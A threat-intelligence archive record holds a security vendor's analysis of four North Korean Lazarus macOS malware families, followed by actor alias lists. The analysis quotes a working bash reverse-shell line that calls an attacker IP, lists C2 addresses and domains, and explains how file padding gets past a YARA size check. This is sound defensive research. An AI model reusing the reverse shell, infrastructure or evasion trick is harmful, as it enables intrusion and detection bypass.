{
	"id": "bcddc8cb-8d19-4d6c-9430-f11d611ea311",
	"created_at": "2026-04-06T00:06:15.422819Z",
	"updated_at": "2026-04-10T03:38:19.930826Z",
	"deleted_at": null,
	"sha1_hash": "e853656e422c21a8f686d9d50e98e4efde51bb8f",
	"title": "Four Distinct Families of Lazarus Malware Target Apple's macOS Platform",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 9199499,
	"plain_text": "Four Distinct Families of Lazarus Malware Target Apple's macOS Platform\r\nBy Phil Stokes\r\nPublished: 2020-07-27 · Archived: 2026-04-05 14:49:54 UTC\r\nAt the beginning of the year, Kaspersky reported new details of an ongoing campaign they called ‘AppleJeus’, attributed to North Korean-backed APT group Lazarus and first spotted in 2018. Kaspersky noted that as of January 2020, the Lazarus group was “currently one of the most active and prolific APT actors”. Since January, other reports have detailed a macOS RAT (DaclsRAT) and linked it to a wider Lazarus cross-platform toolset (MATA framework). Since late May 2020, we have observed three other distinct families of macOS malware likely from the same actors, most of which have not yet been publicly documented. In this post, we provide a high-level overview of all four of these macOS malware families and detail their variants and evolution so far.\r\n1. Trojanized One-Time Password Apps\r\nThe first of these four families has been covered by other researchers in detail; here we will just summarize the main findings for completeness.\r\nFirst seen on 8th April on VirusTotal, the so-called DaclsRAT malware was distributed as a trojanized “One-time-password” (OTP) app called TinkaOTP. The malware embeds a copy of the open-source MinaOTP project as cover for its malicious activities.\r\nWritten in Swift, the initial observed sample was built on a macOS 10.15.3 (19D76) machine, while a second version, compiled the following week on April 1st, was built on 10.15.4 (19E266), indicating if nothing else that the malware authors were vigilant at keeping up with macOS updates on their own machines, whether virtual or metal-based.\r\nAs has been previously reported, there are two variants of the TinkaOTP trojan. The version that has received the most attention contains the malware payload in the application bundle’s Resources folder. The file is a Mach-O binary disguised as a .nib file, at ../Resources/Base.lproj/Submenu.nib. This file is copied directly to the user’s Library folder and renamed as .mina. The dot prefix is added in order to make it invisible in the Finder. This payload is then executed via a user LaunchAgent at ~/Library/LaunchAgents/com.aex-loop.agent.plist.\r\nThe second version does not carry the payload directly but instead downloads it from a C2 into the same location as before. The C2 server address is embedded in the main executable in the TinkaOTP bundle. The hardcoded download and execution code is easily visible, as it consists of unencrypted, plain UTF strings in the binary.\r\nThe .mina Mach-O payload itself contains a number of interesting UTF-16 strings that indicate both its purpose and its C2s:\r\n67.43.239.146:443\r\n185.62.58.207:443\r\nplugin_file\r\nplugin_process\r\n/bin/bash\r\nplugin_reverse_p2p\r\nlogsend\r\nplugin_socks\r\nThe payload’s main() function is fairly succinct and hardcodes both the paths and contents for a LaunchAgent and a LaunchDaemon to achieve persistence.\r\nIn an update last week, researchers suggested that the malware contained in the trojanized OTP app was in fact part of a larger toolkit they named ‘MATA’. Since extensive details of this have already been published, we refer interested readers to the earlier work.\r\n2. New Trojanized CryptoTrading Apps\r\nThe second family of Lazarus malware appearing in recent months has, as far as we are aware, received little to no analysis from researchers, possibly due to its targeted nature and a lack of in-the-wild (ITW) sightings.\r\nTrojanizing cryptocurrency-related apps is where the AppleJeus story began in 2018, and it seems the group must have met with reasonable success, as 2020 has seen at least two new attempts, with CoinGoTrade and Cryptoistic.\r\nWe were first alerted to CoinGoTrade via a tweet on June 3rd from researcher @ccxsaber. A domain at coingotrade.com was set up to lure victims into downloading a fake cryptocurrency app. Although we were not able to source the app bundle, further investigation on VirusTotal revealed two samples of a malicious Mach-O binary that appear to have been the loader:\r\n326d7836d580c08cf4b5e587434f6e5011ebf2284bbf3e7c083a8f41dac36ddd\r\n4f9d2087fadbf7a321a4fbd8d6770a7ace0e4366949b4cfc8cbeb1e9427c02da\r\nThese two samples are both written in Objective-C rather than Swift, and appear identical save for a single line in the main() function, as shown by the following diff:\r\ndiff -y \u003c(otool -tv 326d7836d580c08cf4b5e587434f6e5011ebf2284bbf3e7c083a8f41dac36ddd) \u003c(otool -tv 4f9\r\n0000000100001adc movl $0x4c4b40, %edi | 0000000100001adc movl $0x1, %edi\r\nThe hardcoded value of 0x4c4b40 is the argument passed to the usleep function and equates to 5 seconds (5000000 microseconds). Given no other changes in the code between the two samples, it can be supposed that the second sample, which appeared on VirusTotal 14 days after the first, may have been released as a correction to the first. The cslp() function also causes the code to pause execution for short intervals, so it may be that the authors decided the call to usleep was redundant or somehow not producing the results they desired.\r\nThe samples embed calls to the following URL:\r\nhttps://coingotrade.com/update_coingotrade.php\r\nand post data to the server.\r\nUnfortunately, we were not able to retrieve a sample of the payload executed out of /private/tmp/updatecoingotrade. However, clues to its likely behaviour may perhaps be found in a second trojanized cryptotrading app appearing on VirusTotal in early May 2020, called “Cryptoistic”.\r\nUnlike the CoinGoTrade trojan, Cryptoistic is written in Swift, although it contains a great deal of code bridged to Objective-C, perhaps indicating a developer more familiar with the older programming language. Cryptoistic was compiled on April 2nd, a day after the second version of TinkaOTP, but on a Mac device (real or virtual machine) running an older version of macOS than the one used for compiling the trojanized OTP apps: in this case, 10.15.2 (19C57).\r\nApple’s 19C57 release build had already been superseded several months earlier at the end of January, so at least here the threat actor’s build machine was not being kept up to date.\r\nThe main purpose of Cryptoistic appears to be to entrap users into creating a single account with the fake platform from which to manage multiple accounts on legitimate platforms such as kraken.com, huobi.por, and binance.com. But perhaps most interesting of all is the hardcoded URL \"http://applepkg.com/product/new/iContact.pkg\", which, despite the .pkg suffix, in fact returns a Mach-O payload and drops it at /tmp/.signal_tmp.\r\nThe iContact binary appears to be a backdoor that gathers user and locale data and engages in encrypted communications with a C2 server over TCP. Functionality includes sending and receiving files and running custom commands such as scanning a directory and deleting files.\r\n3. OSX.Casso | Backdoors Galore\r\nAt the same time as TinkaOTP, CoinGoTrade and Cryptoistic began circulating, so too did a family of lightweight backdoor binaries, written primarily in Objective-C and C and making heavy use of standard C libraries built into the operating system. For convenience, we call these closely-related variants OSX.Casso (the reason will become clear shortly).\r\nThe first of these appeared on VirusTotal on June 1st with the file name “osxari”.\r\n3c2f7b8a167433c95aa919da9216f0624032ac9ed9dec71c3c56cacfd5cd1837\r\nSeveral variants followed quickly after:\r\ne63640c53204a59ba59f2c310964149ca3616d79adc40a6c3abd5bf669511756\r\n65cc7663fa5c5665ad5d9c6bec2b6257612f9f0c0ce7e4399e6dc8b464ea88c0\r\n035089b4ef4a981f43455ebee7963af9e7502170ca206458f96be668b1e3674a\r\n(UPX packed; unpacks to: 85d7379b7b82d6b7868f64203a444a5098c72ed7ccff6d1dbb536389a5be5a9c)\r\nand, later\r\n2dd57d67e486d6855df8235c15c9657f39e488ff5275d0ce0fcec7fc8566c64b\r\nThe last of these was uploaded with the filename “cassoosx”. A quick search revealed that there is also a Windows variant cassou.exe (hence the name OSX.Casso):\r\n90ea1c7806e2d638f4a942b36a533a1da61adedd05a6d80ea1e09527cf2d839b\r\nWhat makes these macOS samples all of a piece can be seen from a diff of their symbol tables, which are almost identical across the range of samples and include heavy use of the built-in libcurl.4.dylib.\r\nA diff of the embedded strings also reveals some of the significant differences between the first and most recent of the OSX.Casso samples:\r\ndiff -y \u003c(floss -s osxari) \u003c(floss -s cassoosx)\r\n \u003e bash -i \u003e /dev/tcp/160.20.147.253/8443 0\u003c\u00261 2\u003e\u00261\r\n_webident_f | _media_1\r\n_webident_s | _media_2\r\nhttps://fudcitydelivers.com/net.php | https://lastedforcast.com/list.php\r\nhttps://fudcitydelivers.com/net.php | https://lastedforcast.com/list.php\r\nhttps://sctemarkets.com/net.php | https://audiopodcasts.co/verify.php\r\nxdns | darwin\r\n \u003e @_printf\r\nThe samples are almost identical except that “cassoosx” includes a reverse shell and different C2 domains. All of the samples except cassoosx are around 32KB in size, but cassoosx has also been padded with several megabytes of junk printf calls, quite possibly to beat YARA rules that specify a maximum file size, such as those in Apple’s static signature scanner XProtect.\r\nHere we see the XProtect YARA rule for OSX.Casso:\r\nrule XProtect_MACOS_b17a97e\r\n{\r\n    meta:\r\n        description = \"MACOS.b17a97e\"\r\n    strings:\r\n        $s1 = { 89 C1 C1 E9 07 48 69 C9 11 08 04 02 48 C1 E9 20 69 C9 80 3F 00 00 F7 D9 }\r\n    condition:\r\n        Macho and filesize \u003c 100KB and all of them\r\n}\r\nAlthough the rule’s single string $s1 will hit on the cassoosx sample, the detection will fail because the binary size is well over the maximum 100KB specified in the condition, thanks to the padding.\r\nA further change across OSX.Casso samples can be seen in the hardcoded User Agent strings and the version of Chrome that they denote, with the osxari User Agent encoded as follows:\r\n3c2f7b8a167433c95aa919da9216f0624032ac9ed9dec71c3c56cacfd5cd1837\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36\r\nand all later samples including cassoosx updated to Chrome 83:\r\n2dd57d67e486d6855df8235c15c9657f39e488ff5275d0ce0fcec7fc8566c64b\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36\r\nThe osxari backdoor is itself an evolution of an older Lazarus-related executable ‘Flash Player’ distributed in the malicious Album.app. Here we see the same basic methods and use of libcurl in Album.app’s executable, ‘Flash Player’, but there have been a few revisions in the 2020 code (left: Flash Player; right: osxari).\r\nAfter osxari, all later samples of OSX.Casso begin to include the reverse shell. Unlike the older Flash Player sample, none include a hardcoded persistence LaunchAgent or LaunchDaemon.\r\n4. Emerging Threats | WatchCat and MediaRemote\r\nAs this post was in preparation, an update to Apple’s XProtect signatures late last week revealed yet another Lazarus group Mach-O that differs significantly from those discussed above.\r\nTwo new rules in XProtect identify yet another User Agent string, this time specifying older versions of both macOS and Safari:\r\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15\r\nThe rules also specify strings for “MediaRemote.app” and “com.apple.watchcat.plist”. Searches on VirusTotal have only revealed one sample so far:\r\n3bb96bfaf492782b38985f4bd6b7e7f9dc22c1332b42bb74b16041298fd31f93\r\nDetections have been increasing rapidly over the last 14 days as signature-based solutions have caught up.\r\nAlthough there are some overlaps with the earlier backdoor samples (e.g., the use of “/usr/lib/libcurl.4.dylib”) and the trojanized OTP apps (e.g., inclusion of a hardcoded LaunchDaemon), there is also much more to this malware that has not been seen in the other samples, including use of a WebShell and an onboard crc32 table.\r\nThe symbol table also reveals an old friend from earlier Lazarus campaigns, _MsgTroyInfo.\r\nWhile analysis of watchcat is still ongoing and we have yet to see an in-the-wild infection, it’s clear that the rapid iteration of all these various Lazarus-related malware samples shows the actor is heavily invested in the macOS platform.\r\nConclusion\r\nAll of the samples reviewed above have appeared in the last eight to ten weeks and are evidence that the threat actors behind the Lazarus group are pursuing several distinct campaigns, using a variety of technologies, and are themselves keeping up to date with the Apple platform. These are not actors merely porting Windows malware to macOS, but rather Mac-specific developers deeply invested in writing custom malware for Apple’s platform. Primarily, the samples we have reviewed here appear to be designed to steal cryptocurrency and maintain backdoors into their targets’ devices, but there is clearly much more to be learned about these campaigns. The SentinelOne Platform protects users against all the samples reviewed in this post. For more information about the SentinelOne macOS agent, see here.\r\nIOCs \u0026 Samples\r\nSource: https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/"
	],
	"report_names": [
		"four-distinct-families-of-lazarus-malware-target-apples-macos-platform"
	],
	"threat_actors": [
		{
			"id": "34eea331-d052-4096-ae03-a22f1d090bd4",
			"created_at": "2025-08-07T02:03:25.073494Z",
			"updated_at": "2026-04-10T02:00:03.709243Z",
			"deleted_at": null,
			"main_name": "NICKEL ACADEMY",
			"aliases": [
				"ATK3 ",
				"Black Artemis ",
				"COVELLITE ",
				"CTG-2460 ",
				"Citrine Sleet ",
				"Diamond Sleet ",
				"Guardians of Peace",
				"HIDDEN COBRA ",
				"High Anonymous",
				"Labyrinth Chollima ",
				"Lazarus Group ",
				"NNPT Group",
				"New Romanic Cyber Army Team",
				"Temp.Hermit ",
				"UNC577 ",
				"Who Am I?",
				"Whois Team",
				"ZINC "
			],
			"source_name": "Secureworks:NICKEL ACADEMY",
			"tools": [
				"Destover",
				"KorHigh",
				"Volgmer"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "544ecd2c-82c9-417c-9d98-d1ae395df964",
			"created_at": "2025-10-29T02:00:52.035025Z",
			"updated_at": "2026-04-10T02:00:05.408558Z",
			"deleted_at": null,
			"main_name": "AppleJeus",
			"aliases": [
				"AppleJeus",
				"Gleaming Pisces",
				"Citrine Sleet",
				"UNC1720",
				"UNC4736"
			],
			"source_name": "MITRE:AppleJeus",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "732597b1-40a8-474c-88cc-eb8a421c29f1",
			"created_at": "2025-08-07T02:03:25.087732Z",
			"updated_at": "2026-04-10T02:00:03.776007Z",
			"deleted_at": null,
			"main_name": "NICKEL GLADSTONE",
			"aliases": [
				"APT38 ",
				"ATK 117 ",
				"Alluring Pisces ",
				"Black Alicanto ",
				"Bluenoroff ",
				"CTG-6459 ",
				"Citrine Sleet ",
				"HIDDEN COBRA ",
				"Lazarus Group",
				"Sapphire Sleet ",
				"Selective Pisces ",
				"Stardust Chollima ",
				"T-APT-15 ",
				"TA444 ",
				"TAG-71 "
			],
			"source_name": "Secureworks:NICKEL GLADSTONE",
			"tools": [
				"AlphaNC",
				"Bankshot",
				"CCGC_Proxy",
				"Ratankba",
				"RustBucket",
				"SUGARLOADER",
				"SwiftLoader",
				"Wcry"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-10T02:00:02.971571Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Operation DarkSeoul",
				"Bureau 121",
				"Group 77",
				"APT38",
				"NICKEL GLADSTONE",
				"G0082",
				"COPERNICIUM",
				"Moonstone Sleet",
				"Operation GhostSecret",
				"APT 38",
				"Appleworm",
				"Unit 121",
				"ATK3",
				"G0032",
				"ATK117",
				"NewRomanic Cyber Army Team",
				"Nickel Academy",
				"Sapphire Sleet",
				"Lazarus group",
				"Hastati Group",
				"Subgroup: Bluenoroff",
				"Operation Troy",
				"Black Artemis",
				"Dark Seoul",
				"Andariel",
				"Labyrinth Chollima",
				"Operation AppleJeus",
				"COVELLITE",
				"Citrine Sleet",
				"DEV-0139",
				"DEV-1222",
				"Hidden Cobra",
				"Bluenoroff",
				"Stardust Chollima",
				"Whois Hacking Team",
				"Diamond Sleet",
				"TA404",
				"BeagleBoyz",
				"APT-C-26"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "32a223a8-3c79-4146-87c5-8557d38662ae",
			"created_at": "2022-10-25T15:50:23.703698Z",
			"updated_at": "2026-04-10T02:00:05.261989Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Lazarus Group",
				"Labyrinth Chollima",
				"HIDDEN COBRA",
				"Guardians of Peace",
				"NICKEL ACADEMY",
				"Diamond Sleet"
			],
			"source_name": "MITRE:Lazarus Group",
			"tools": [
				"RawDisk",
				"Proxysvc",
				"BADCALL",
				"FALLCHILL",
				"WannaCry",
				"MagicRAT",
				"HOPLIGHT",
				"TYPEFRAME",
				"Dtrack",
				"HotCroissant",
				"HARDRAIN",
				"Dacls",
				"KEYMARBLE",
				"TAINTEDSCRIBE",
				"AuditCred",
				"netsh",
				"ECCENTRICBANDWAGON",
				"AppleJeus",
				"BLINDINGCAN",
				"ThreatNeedle",
				"Volgmer",
				"Cryptoistic",
				"RATANKBA",
				"Bankshot"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f32df445-9fb4-4234-99e0-3561f6498e4e",
			"created_at": "2022-10-25T16:07:23.756373Z",
			"updated_at": "2026-04-10T02:00:04.739611Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"APT-C-26",
				"ATK 3",
				"Appleworm",
				"Citrine Sleet",
				"DEV-0139",
				"Diamond Sleet",
				"G0032",
				"Gleaming Pisces",
				"Gods Apostles",
				"Gods Disciples",
				"Group 77",
				"Guardians of Peace",
				"Hastati Group",
				"Hidden Cobra",
				"ITG03",
				"Jade Sleet",
				"Labyrinth Chollima",
				"Lazarus Group",
				"NewRomanic Cyber Army Team",
				"Operation 99",
				"Operation AppleJeus",
				"Operation AppleJeus sequel",
				"Operation Blockbuster: Breach of Sony Pictures Entertainment",
				"Operation CryptoCore",
				"Operation Dream Job",
				"Operation Dream Magic",
				"Operation Flame",
				"Operation GhostSecret",
				"Operation In(ter)caption",
				"Operation LolZarus",
				"Operation Marstech Mayhem",
				"Operation No Pineapple!",
				"Operation North Star",
				"Operation Phantom Circuit",
				"Operation Sharpshooter",
				"Operation SyncHole",
				"Operation Ten Days of Rain / DarkSeoul",
				"Operation Troy",
				"SectorA01",
				"Slow Pisces",
				"TA404",
				"TraderTraitor",
				"UNC2970",
				"UNC4034",
				"UNC4736",
				"UNC4899",
				"UNC577",
				"Whois Hacking Team"
			],
			"source_name": "ETDA:Lazarus Group",
			"tools": [
				"3CX Backdoor",
				"3Rat Client",
				"3proxy",
				"AIRDRY",
				"ARTFULPIE",
				"ATMDtrack",
				"AlphaNC",
				"Alreay",
				"Andaratm",
				"AngryRebel",
				"AppleJeus",
				"Aryan",
				"AuditCred",
				"BADCALL",
				"BISTROMATH",
				"BLINDINGCAN",
				"BTC Changer",
				"BUFFETLINE",
				"BanSwift",
				"Bankshot",
				"Bitrep",
				"Bitsran",
				"BlindToad",
				"Bookcode",
				"BootWreck",
				"BottomLoader",
				"Brambul",
				"BravoNC",
				"Breut",
				"COLDCAT",
				"COPPERHEDGE",
				"CROWDEDFLOUNDER",
				"Castov",
				"CheeseTray",
				"CleanToad",
				"ClientTraficForwarder",
				"CollectionRAT",
				"Concealment Troy",
				"Contopee",
				"CookieTime",
				"Cyruslish",
				"DAVESHELL",
				"DBLL Dropper",
				"DLRAT",
				"DRATzarus",
				"DRATzarus RAT",
				"Dacls",
				"Dacls RAT",
				"DarkComet",
				"DarkKomet",
				"DeltaCharlie",
				"DeltaNC",
				"Dembr",
				"Destover",
				"DoublePulsar",
				"Dozer",
				"Dtrack",
				"Duuzer",
				"DyePack",
				"ECCENTRICBANDWAGON",
				"ELECTRICFISH",
				"Escad",
				"EternalBlue",
				"FALLCHILL",
				"FYNLOS",
				"FallChill RAT",
				"Farfli",
				"Fimlis",
				"FoggyBrass",
				"FudModule",
				"Fynloski",
				"Gh0st RAT",
				"Ghost RAT",
				"Gopuram",
				"HARDRAIN",
				"HIDDEN COBRA RAT/Worm",
				"HLOADER",
				"HOOKSHOT",
				"HOPLIGHT",
				"HOTCROISSANT",
				"HOTWAX",
				"HTTP Troy",
				"Hawup",
				"Hawup RAT",
				"Hermes",
				"HotCroissant",
				"HotelAlfa",
				"Hotwax",
				"HtDnDownLoader",
				"Http Dr0pper",
				"ICONICSTEALER",
				"Joanap",
				"Jokra",
				"KANDYKORN",
				"KEYMARBLE",
				"Kaos",
				"KillDisk",
				"KillMBR",
				"Koredos",
				"Krademok",
				"LIGHTSHIFT",
				"LIGHTSHOW",
				"LOLBAS",
				"LOLBins",
				"Lazarus",
				"LightlessCan",
				"Living off the Land",
				"MATA",
				"MBRkiller",
				"MagicRAT",
				"Manuscrypt",
				"Mimail",
				"Mimikatz",
				"Moudour",
				"Mydoom",
				"Mydoor",
				"Mytob",
				"NACHOCHEESE",
				"NachoCheese",
				"NestEgg",
				"NickelLoader",
				"NineRAT",
				"Novarg",
				"NukeSped",
				"OpBlockBuster",
				"PCRat",
				"PEBBLEDASH",
				"PLANKWALK",
				"POOLRAT",
				"PSLogger",
				"PhanDoor",
				"Plink",
				"PondRAT",
				"PowerBrace",
				"PowerRatankba",
				"PowerShell RAT",
				"PowerSpritz",
				"PowerTask",
				"Preft",
				"ProcDump",
				"Proxysvc",
				"PuTTY Link",
				"QUICKRIDE",
				"QUICKRIDE.POWER",
				"Quickcafe",
				"QuiteRAT",
				"R-C1",
				"ROptimizer",
				"Ratabanka",
				"RatabankaPOS",
				"Ratankba",
				"RatankbaPOS",
				"RawDisk",
				"RedShawl",
				"Rifdoor",
				"Rising Sun",
				"Romeo-CoreOne",
				"RomeoAlfa",
				"RomeoBravo",
				"RomeoCharlie",
				"RomeoCore",
				"RomeoDelta",
				"RomeoEcho",
				"RomeoFoxtrot",
				"RomeoGolf",
				"RomeoHotel",
				"RomeoMike",
				"RomeoNovember",
				"RomeoWhiskey",
				"Romeos",
				"RustBucket",
				"SHADYCAT",
				"SHARPKNOT",
				"SIGFLIP",
				"SIMPLESEA",
				"SLICKSHOES",
				"SORRYBRUTE",
				"SUDDENICON",
				"SUGARLOADER",
				"SheepRAT",
				"SierraAlfa",
				"SierraBravo",
				"SierraCharlie",
				"SierraJuliett-MikeOne",
				"SierraJuliett-MikeTwo",
				"SimpleTea",
				"SimplexTea",
				"SmallTiger",
				"Stunnel",
				"TAINTEDSCRIBE",
				"TAXHAUL",
				"TFlower",
				"TOUCHKEY",
				"TOUCHMOVE",
				"TOUCHSHIFT",
				"TOUCHSHOT",
				"TWOPENCE",
				"TYPEFRAME",
				"Tdrop",
				"Tdrop2",
				"ThreatNeedle",
				"Tiger RAT",
				"TigerRAT",
				"Trojan Manuscript",
				"Troy",
				"TroyRAT",
				"VEILEDSIGNAL",
				"VHD",
				"VHD Ransomware",
				"VIVACIOUSGIFT",
				"VSingle",
				"ValeforBeta",
				"Volgmer",
				"Vyveva",
				"W1_RAT",
				"Wana Decrypt0r",
				"WanaCry",
				"WanaCrypt",
				"WanaCrypt0r",
				"WannaCry",
				"WannaCrypt",
				"WannaCryptor",
				"WbBot",
				"Wcry",
				"Win32/KillDisk.NBB",
				"Win32/KillDisk.NBC",
				"Win32/KillDisk.NBD",
				"Win32/KillDisk.NBH",
				"Win32/KillDisk.NBI",
				"WinorDLL64",
				"Winsec",
				"WolfRAT",
				"Wormhole",
				"YamaBot",
				"Yort",
				"ZetaNile",
				"concealment_troy",
				"http_troy",
				"httpdr0pper",
				"httpdropper",
				"klovbot",
				"sRDI"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775433975,
	"ts_updated_at": 1775792299,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e853656e422c21a8f686d9d50e98e4efde51bb8f.pdf",
		"text": "https://archive.orkl.eu/e853656e422c21a8f686d9d50e98e4efde51bb8f.txt",
		"img": "https://archive.orkl.eu/e853656e422c21a8f686d9d50e98e4efde51bb8f.jpg"
	}
}